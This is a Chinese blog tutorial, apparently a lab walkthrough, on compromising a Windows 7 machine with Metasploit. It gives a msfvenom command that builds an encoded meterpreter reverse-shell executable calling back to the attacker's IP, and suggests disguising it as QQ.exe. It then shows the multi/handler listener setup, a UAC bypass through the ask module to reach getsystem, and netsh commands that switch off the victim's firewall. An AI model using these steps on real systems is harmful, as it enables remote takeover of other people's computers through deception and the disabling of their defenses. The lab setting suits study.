攻下windows7第三天——构造payload

一.实验背景

随着windows系统的不断更新完善,windows对用户系统的安全力度也在加强。第一天和第二天的漏洞也很容易通过添加补丁修复,这对我们的渗透,也带来了不少的麻烦。所以今天我将带大家,利用目前流行的 metasploit 框架,绕过一些 UAC 及防火墙的限制,从而达到成功利用的目的!

二.实验环境

攻击机kali :192.168.126.129
靶机 win7:192.168.126.134

三.操作步骤

1.使用.exe作为web shell(关闭防火墙)
(1)生成一个payload
命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.126.129 lport=4444 -f exe -o /root/virus.exe -e x86/shikata_ga_nai -i 8
在这里插入图片描述
(2)将程序上传到win7
可以适当伪装该程序(例如QQ.exe)
可以适当伪装该程序(例如QQ.exe)
(3)在kali中配置一个会话反弹程序
命令:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.126.129
set LPORT 4444
exploit

在这里插入图片描述
(4)当win7点击该软件后,就会执行meterpreter模块
在这里插入图片描述
(5)执行meterpreter模块的命令
例如:
在这里插入图片描述

2.使用.exe作为web shell(开启防火墙)
设置步骤如上同
(1)利用 getuid 和 getsystem 命令来提权
在这里插入图片描述
可以发现命令遭到了 UAC 的用户访问控制的拦截
(2)使用msfconsole其他模块绕过
命令:

use exploit/windows/local/ask
options
set session 1
exploit

在这里插入图片描述
此时win7会弹出一个窗口,点击确定即可
在这里插入图片描述
重新输入getsystem命令,此时不会报错
在这里插入图片描述
成功绕过防火墙

(3)重新进入会话(ASK模块)
相关操作:

exploit      //立刻发起进攻
exploit -l   //发起进攻存入后台
background   //将session放入后台
sessions     //查看当前session
sessions -i xx   //调用后台  

在这里插入图片描述

现在我们通过shell来关闭防火墙
命令:

shell
netsh adcfirewall set allprofiles state off
shell(cmd界面)其他相关操作:
netsh advfirewall show allprofiles     //查看当前防火墙状态
netsh advfirewall set allprofiles state off   //关闭防火墙
netsh advfirewall set allprofiles state on   //开启防火墙

在这里插入图片描述
(出现乱码的原因:linux与windows编码格式不同。可以使用命令chcp 65001修复)
在win7中查看防火墙状态
在这里插入图片描述

可以看到防火墙已经关上,并已获得最高权限

网络信息安全-ploto

  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值